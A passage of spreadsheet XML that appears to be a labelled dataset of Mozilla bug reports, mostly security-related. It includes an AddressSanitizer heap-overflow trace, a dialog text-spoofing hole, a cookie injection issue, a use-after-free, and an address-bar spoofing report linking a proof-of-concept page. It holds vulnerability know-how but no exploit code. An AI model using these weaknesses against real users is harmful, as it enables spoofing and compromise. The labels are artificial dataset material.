    #10 0x7f5f7d87df1e in non-virtual thunk to nsPlaintextEditor::InsertText(nsAString_internal const&amp;) src/build/unix/stdc++compat/stdc++compat.cpp:0
    #11 0x7f5f7d9995d8 in nsInsertPlaintextCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/editor/libeditor/base/nsEditorCommands.cpp:846
    #12 0x7f5f80c790d1 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:175
    #13 0x7f5f80c4c3a2 in nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:153
    #14 0x7f5f80c4c676 in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) src/build/unix/stdc++compat/stdc++compat.cpp:0
    #15 0x7f5f80c62c8f in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) src/embedding/components/commandhandler/src/nsCommandManager.cpp:234
    #16 0x7f5f7c1e9498 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/content/html/document/src/nsHTMLDocument.cpp:3232
    #17 0x7f5f7c1eaded in non-virtual thunk to nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/build/unix/stdc++compat/stdc++compat.cpp:0
    #18 0x7f5f8438cef7 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #19 0x7f5f7f801e5e in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3106
    #20 0x7f5f7f8649f5 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1478
    #21 0x7f5f8aeeb731 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:372
    #22 0x7f5f8ae78821 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2413
    #23 0x7f5f8addf815 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:309
    #24 0x7f5f8aef8a46 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:494
    #25 0x7f5f8aefa9fe in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:531
    #26 0x7f5f8a652034 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5665
    #27 0x7f5f8a656fd1 in JS_EvaluateUCScriptForPrincipalsVersionOrigin src/js/src/jsapi.cpp:5746
    #28 0x7f5f7c981e3f in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1497
    #29 0x7f5f7cb319cf in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9590
    #30 0x7f5f7cae9349 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9851
    #31 0x7f5f7cb2fa2a in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10118
    #32 0x7f5f842ccbc2 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #33 0x7f5f842ce478 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #34 0x7f5f84291f99 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:625
    #35 0x7f5f83f34017 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #36 0x7f5f82d10bd5 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #37 0x7f5f8453ea79 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #38 0x7f5f8453e8c2 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #39 0x7f5f8453e7a7 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #40 0x7f5f821dadee in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #41 0x7f5f80e4dc88 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #42 0x7f5f776596f0 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3800
    #43 0x7f5f7765f964 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3877
    #44 0x7f5f77662a2e in XRE_main src/toolkit/xre/nsAppRunner.cpp:3953
    #45 0x40c5bb in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #46 0x409e1f in main src/browser/app/nsBrowserApp.cpp:279
    #47 0x7f5f9470ac4d in ?? ??:0
0x7f5f56a1dc9d is located 0 bytes to the right of 1053-byte region [0x7f5f56a1d880,0x7f5f56a1dc9d)
allocated by thread T0 here:
    #0 0x4c3ef0 in __interceptor_malloc ??:0
    #1 0x7f5f915a86c6 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:57
    #2 0x7f5f843106d2 in NS_Alloc_P src/xpcom/base/nsMemoryImpl.cpp:163
    #3 0x7f5f777ad7d2 in nsMemory::Alloc(unsigned long) src/../../../dist/include/nsMemory.h:36
    #4 0x7f5f7acbea88 in nsTextFragment::SetTo(unsigned short const*, int, bool) src/content/base/src/nsTextFragment.cpp:264
    #5 0x7f5f7aa69561 in nsGenericDOMDataNode::SetTextInternal(unsigned int, unsigned int, unsigned short const*, unsigned int, bool, CharacterDataChangeInfo::Details*) src/content/base/src/nsGenericDOMDataNode.cpp:307
    #6 0x7f5f7aa776f8 in nsGenericDOMDataNode::SetText(unsigned short const*, unsigned int, bool) src/content/base/src/nsGenericDOMDataNode.cpp:850
    #7 0x7f5f78bda486 in nsIContent::SetText(nsAString_internal const&amp;, bool) src/../../../../dist/include/nsIContent.h:513
    #8 0x7f5f7a487a84 in CompressWhitespace(nsIContent*) src/layout/mathml/nsMathMLTokenFrame.cpp:98
    #9 0x7f5f7a4872dc in nsMathMLTokenFrame::Init(nsIContent*, nsIFrame*, nsIFrame*) src/layout/mathml/nsMathMLTokenFrame.cpp:111
    #10 0x7f5f78beb992 in nsCSSFrameConstructor::InitAndRestoreFrame(nsFrameConstructorState const&amp;, nsIContent*, nsIFrame*, nsIFrame*, nsIFrame*, bool) src/layout/base/nsCSSFrameConstructor.cpp:4545
    #11 0x7f5f78c1b334 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:3647
    #12 0x7f5f78c33520 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:5551
    #13 0x7f5f78bec989 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:9817
    #14 0x7f5f78beeb58 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsIFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) src/layout/base/nsCSSFrameConstructor.cpp:9961
    #15 0x7f5f78c04094 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsStyleDisplay const*, nsIContent*, nsIFrame*, nsIFrame*, nsStyleContext*, nsIFrame**, nsFrameItems&amp;, bool, PendingBinding*) src/layout/base/nsCSSFrameConstructor.cpp:11008
    #16 0x7f5f78c27c40 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsIFrame*, nsStyleDisplay const*, nsFrameItems&amp;, nsIFrame**) src/layout/base/nsCSSFrameConstructor.cpp:4522
    #17 0x7f5f78c1a74e in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:3611
    #18 0x7f5f78c33520 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:5551
    #19 0x7f5f78bec989 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:9817
    #20 0x7f5f78c50f02 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) src/layout/base/nsCSSFrameConstructor.cpp:7218
    #21 0x7f5f78c4a8fa in nsCSSFrameConstructor::ContentInserted(nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) src/layout/base/nsCSSFrameConstructor.cpp:6837
    #22 0x7f5f78c3af4d in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool) src/layout/base/nsCSSFrameConstructor.cpp:9341
    #23 0x7f5f78c6a537 in nsCSSFrameConstructor::ProcessRestyledFrames(nsStyleChangeList&amp;) src/layout/base/nsCSSFrameConstructor.cpp:8084
    #24 0x7f5f78bbb933 in mozilla::css::RestyleTracker::ProcessOneRestyle(mozilla::dom::Element*, nsRestyleHint, nsChangeHint) src/layout/base/RestyleTracker.cpp:132
Shadow byte and word:
  0x1febead43b93: 5
  0x1febead43b90: 00 00 00 05 fb fb fb fb
More shadow bytes:
  0x1febead43b70: 00 00 00 00 00 00 00 00
  0x1febead43b78: 00 00 00 00 00 00 00 00
  0x1febead43b80: 00 00 00 00 00 00 00 00
  0x1febead43b88: 00 00 00 00 00 00 00 00
=&gt;0x1febead43b90: 00 00 00 05 fb fb fb fb
  0x1febead43b98: fb fb fb fb fb fb fb fb
  0x1febead43ba0: fa fa fa fa fa fa fa fa
  0x1febead43ba8: fa fa fa fa fa fa fa fa
  0x1febead43bb0: fa fa fa fa fa fa fa fa
Stats: 238M malloced (274M for red zones) by 500040 calls
Stats: 42M realloced by 21762 calls
Stats: 203M freed by 265667 calls
Stats: 71M really freed by 156628 calls
Stats: 448M (114766 full pages) mmaped in 112 calls
  mmaps   by size class: 8:294894; 9:40955; 10:16380; 11:14329; 12:3072; 13:1536; 14:1280; 15:256; 16:448; 17:1248; 18:160; 19:40; 20:16;
  mallocs by size class: 8:406418; 9:50541; 10:17092; 11:17141; 12:2998; 13:1978; 14:1488; 15:324; 16:525; 17:1297; 18:179; 19:42; 20:17;
  frees   by size class: 8:189390; 9:41298; 10:13781; 11:13967; 12:2077; 13:1668; 14:1286; 15:282; 16:466; 17:1284; 18:115; 19:39; 20:14;
  rfrees  by size class: 8:117290; 9:19910; 10:7974; 11:9114; 12:582; 13:521; 14:398; 15:147; 16:339; 17:319; 18:28; 19:5; 20:1;
Stats: malloc large: 1535 small slow: 2173
==30534== ABORTING</t>
        </is>
      </c>
      <c r="X5177" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5178">
      <c r="A5178" t="n">
        <v>253942</v>
      </c>
      <c r="B5178" t="inlineStr">
        <is>
          <t>2004-08-01 13:53:11 -0700</t>
        </is>
      </c>
      <c r="C5178" t="inlineStr">
        <is>
          <t>enablePrivilege parameter can change the meaning of the dialog</t>
        </is>
      </c>
      <c r="D5178" t="inlineStr">
        <is>
          <t>2013-06-09 18:54:46 -0700</t>
        </is>
      </c>
      <c r="E5178" t="n">
        <v>1</v>
      </c>
      <c r="F5178" t="n">
        <v>1</v>
      </c>
      <c r="G5178" t="n">
        <v>3</v>
      </c>
      <c r="H5178" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5178" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5178" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5178" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5178" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5178" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5178" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5178" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5178" t="inlineStr"/>
      <c r="Q5178" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5178" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5178" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5178" t="n">
        <v>1</v>
      </c>
      <c r="U5178" t="n">
        <v>0</v>
      </c>
      <c r="V5178" t="n">
        <v>35</v>
      </c>
      <c r="W5178" t="inlineStr">
        <is>
          <t>Scripts calling enablePrivilege can change the meaning of setences in the dialog
by passing a parameter with spaces and English words.
As usual for enablePrivilege dialog holes, exploitation requires signing your
script.  ActiveX spyware reminds us that this is not an effective deterrent.</t>
        </is>
      </c>
      <c r="X5178" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5179">
      <c r="A5179" t="n">
        <v>830422</v>
      </c>
      <c r="B5179" t="inlineStr">
        <is>
          <t>2013-01-14 10:42:33 -0800</t>
        </is>
      </c>
      <c r="C5179" t="inlineStr">
        <is>
          <t>Handle Bango cancel error gracefully</t>
        </is>
      </c>
      <c r="D5179" t="inlineStr">
        <is>
          <t>2013-01-18 13:54:29 -0800</t>
        </is>
      </c>
      <c r="E5179" t="n">
        <v>1</v>
      </c>
      <c r="F5179" t="n">
        <v>1</v>
      </c>
      <c r="G5179" t="n">
        <v>6</v>
      </c>
      <c r="H5179" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5179" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5179" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K5179" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L5179" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5179" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5179" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5179" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5179" t="inlineStr">
        <is>
          <t>u=patron p=1</t>
        </is>
      </c>
      <c r="Q5179" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5179" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5179" t="inlineStr">
        <is>
          <t>2013-01-17</t>
        </is>
      </c>
      <c r="T5179" t="n">
        <v>1</v>
      </c>
      <c r="U5179" t="n">
        <v>0</v>
      </c>
      <c r="V5179" t="n">
        <v>9</v>
      </c>
      <c r="W5179" t="inlineStr">
        <is>
          <t>When a buyer clicks the Cancel button anywhere in Bango's hosted payment flow, it redirects to Mozilla's error page. This should void the transaction like bug 828513 but it should be graceful about it and close the payment window and return to the app.</t>
        </is>
      </c>
      <c r="X5179" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5180">
      <c r="A5180" t="n">
        <v>643051</v>
      </c>
      <c r="B5180" t="inlineStr">
        <is>
          <t>2011-03-18 17:21:05 -0700</t>
        </is>
      </c>
      <c r="C5180" t="inlineStr">
        <is>
          <t>document.cookie should only allow setting one cookie at a time</t>
        </is>
      </c>
      <c r="D5180" t="inlineStr">
        <is>
          <t>2011-06-16 15:15:42 -0700</t>
        </is>
      </c>
      <c r="E5180" t="n">
        <v>1</v>
      </c>
      <c r="F5180" t="n">
        <v>1</v>
      </c>
      <c r="G5180" t="n">
        <v>3</v>
      </c>
      <c r="H5180" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5180" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5180" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K5180" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5180" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5180" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5180" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5180" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5180" t="inlineStr">
        <is>
          <t>[sg:nse]</t>
        </is>
      </c>
      <c r="Q5180" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5180" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5180" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T5180" t="n">
        <v>1</v>
      </c>
      <c r="U5180" t="n">
        <v>1</v>
      </c>
      <c r="V5180" t="n">
        <v>22</v>
      </c>
      <c r="W5180" t="inlineStr">
        <is>
          <t>Currently, document.cookie allows setting multiple cookies in a single call.
This is inconsistent with other browsers as well as our documentation:
https://developer.mozilla.org/en/document.cookie
"Note that you can only set/update a single cookie at a time using this method."
This can lead to security problems in web applications: When an external script takes untrusted input (e.g. from a URL parameter), that input can contain line breaks, and thus set multiple cookies to the including web site.
Therefore, we should disallow setting multiple cookies using document.cookie.</t>
        </is>
      </c>
      <c r="X5180" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5181">
      <c r="A5181" t="n">
        <v>1234576</v>
      </c>
      <c r="B5181" t="inlineStr">
        <is>
          <t>2015-12-22 08:44:52 -0800</t>
        </is>
      </c>
      <c r="C5181" t="inlineStr">
        <is>
          <t>UAF in ReturnSSRC() (in MutexAutoLock::MutexAutoLock)</t>
        </is>
      </c>
      <c r="D5181" t="inlineStr">
        <is>
          <t>2017-02-09 07:53:10 -0800</t>
        </is>
      </c>
      <c r="E5181" t="n">
        <v>1</v>
      </c>
      <c r="F5181" t="n">
        <v>1</v>
      </c>
      <c r="G5181" t="n">
        <v>3</v>
      </c>
      <c r="H5181" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5181" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5181" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K5181" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5181" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5181" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5181" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5181" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P5181" t="inlineStr">
        <is>
          <t>[adv-main44+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5181" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5181" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5181" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5181" t="n">
        <v>1</v>
      </c>
      <c r="U5181" t="n">
        <v>0</v>
      </c>
      <c r="V5181" t="n">
        <v>13</v>
      </c>
      <c r="W5181" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-669bef59-2d03-45b8-9137-015f42151218.
=============================================================
UAF, seen a few times in the last month ending a call.
May be fixed in 45 by the webrtc.org 43 update, which changes the threads things are accessed on.</t>
        </is>
      </c>
      <c r="X5181" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5182">
      <c r="A5182" t="n">
        <v>838413</v>
      </c>
      <c r="B5182" t="inlineStr">
        <is>
          <t>2013-02-05 18:03:38 -0800</t>
        </is>
      </c>
      <c r="C5182" t="inlineStr">
        <is>
          <t>Blacklist Mesa in ESR17 (nothing sensational here --- ESR is the enterprise no-cool-stuff branch)</t>
        </is>
      </c>
      <c r="D5182" t="inlineStr">
        <is>
          <t>2014-01-10 10:40:33 -0800</t>
        </is>
      </c>
      <c r="E5182" t="n">
        <v>1</v>
      </c>
      <c r="F5182" t="n">
        <v>1</v>
      </c>
      <c r="G5182" t="n">
        <v>3</v>
      </c>
      <c r="H5182" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5182" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5182" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5182" t="inlineStr">
        <is>
          <t>17 Branch</t>
        </is>
      </c>
      <c r="L5182" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5182" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5182" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5182" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5182" t="inlineStr"/>
      <c r="Q5182" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5182" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5182" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5182" t="n">
        <v>1</v>
      </c>
      <c r="U5182" t="n">
        <v>0</v>
      </c>
      <c r="V5182" t="n">
        <v>12</v>
      </c>
      <c r="W5182" t="inlineStr">
        <is>
          <t>In ESR10 Mesa was blacklisted and we've had many occasions to be thankful for that.
We should do the same for ESR17.
Example: bug 827106. I don't want to have to ask for ESR approval for a backport of this ANGLE patch.</t>
        </is>
      </c>
      <c r="X5182" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5183">
      <c r="A5183" t="n">
        <v>1596515</v>
      </c>
      <c r="B5183" t="inlineStr">
        <is>
          <t>2019-11-14 10:37:57 -0800</t>
        </is>
      </c>
      <c r="C5183" t="inlineStr">
        <is>
          <t>IFV bug details page has title "Bug xxx - null"</t>
        </is>
      </c>
      <c r="D5183" t="inlineStr">
        <is>
          <t>2021-12-05 14:47:40 -0800</t>
        </is>
      </c>
      <c r="E5183" t="n">
        <v>1</v>
      </c>
      <c r="F5183" t="n">
        <v>1</v>
      </c>
      <c r="G5183" t="n">
        <v>7</v>
      </c>
      <c r="H5183" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5183" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5183" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5183" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5183" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5183" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5183" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5183" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5183" t="inlineStr"/>
      <c r="Q5183" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5183" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5183" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5183" t="n">
        <v>1</v>
      </c>
      <c r="U5183" t="n">
        <v>0</v>
      </c>
      <c r="V5183" t="n">
        <v>4</v>
      </c>
      <c r="W5183" t="inlineStr">
        <is>
          <t>I noticed this starting this week (side-effect of the weekend taskcluster migrations??).
IFV bug details pages, like
https://treeherder.mozilla.org/intermittent-failures.html#/bugdetails?startday=2019-11-07&amp;endday=2019-11-14&amp;tree=trunk&amp;bug=1411358
have an odd looking page title: "Bug 1411358 - null".</t>
        </is>
      </c>
      <c r="X5183" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5184">
      <c r="A5184" t="n">
        <v>1826622</v>
      </c>
      <c r="B5184" t="inlineStr">
        <is>
          <t>2023-04-05 10:41:09 -0700</t>
        </is>
      </c>
      <c r="C5184" t="inlineStr">
        <is>
          <t>datalist option can hide url address bar lead to spoof</t>
        </is>
      </c>
      <c r="D5184" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:57 -0700</t>
        </is>
      </c>
      <c r="E5184" t="n">
        <v>1</v>
      </c>
      <c r="F5184" t="n">
        <v>1</v>
      </c>
      <c r="G5184" t="n">
        <v>3</v>
      </c>
      <c r="H5184" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5184" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5184" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K5184" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5184" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5184" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5184" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main113+][adv-ESR102.11+]</t>
        </is>
      </c>
      <c r="Q5184" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5184" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5184" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T5184" t="n">
        <v>1</v>
      </c>
      <c r="U5184" t="n">
        <v>0</v>
      </c>
      <c r="V5184" t="n">
        <v>40</v>
      </c>
      <c r="W5184" t="inlineStr">
        <is>
          <t>Created attachment 9327180
spooffirefox.html
I found a vulnerability on firefox 110.0.1 (64-bit) (i tested on windows OS) where datalist option can cover url  address bar which can lead to spoofs.
step to reproduces:
1. open http://103.186.0.20/datalist.html or spooffirefox.html
2. press "h" then the option of datalist  cover url  address bar</t>
        </is>
      </c>
      <c r="X5184" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5185">
      <c r="A5185" t="n">
        <v>391178</v>
      </c>
      <c r="B5185" t="inlineStr">
        <is>
          <t>2007-08-06 21:03:38 -0700</t>
        </is>
      </c>
      <c r="C5185" t="inlineStr">
        <is>
          <t>Crash [@ nsCSSFrameConstructor::FindFrameWithContent] with XUL trees, position:fixed</t>
        </is>
      </c>
      <c r="D5185" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E5185" t="n">
        <v>1</v>
      </c>
      <c r="F5185" t="n">
        <v>1</v>
      </c>
      <c r="G5185" t="n">
        <v>3</v>
      </c>
      <c r="H5185" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5185" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5185" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K5185" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5185" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5185" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5185" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5185" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5185" t="inlineStr">
        <is>
          <t>[sg:critical?][dbaron-1.9:Rs]</t>
        </is>
      </c>
      <c r="Q5185" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5185" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5185" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5185" t="n">
        <v>1</v>
      </c>
      <c r="U5185" t="n">
        <v>0</v>
      </c>
      <c r="V5185" t="n">
        <v>60</v>
      </c>
      <c r="W5185" t="inlineStr">
        <is>
          <t>Thread 0 Crashed reading memory at 0xdddddddd:
0   nsCSSFrameConstructor::FindFrameWithContent(nsFrameManager*, nsIFrame*, nsIContent*, nsIContent*, nsFindFrameHint*) + 372 (nsCSSFrameConstructor.cpp:10773)
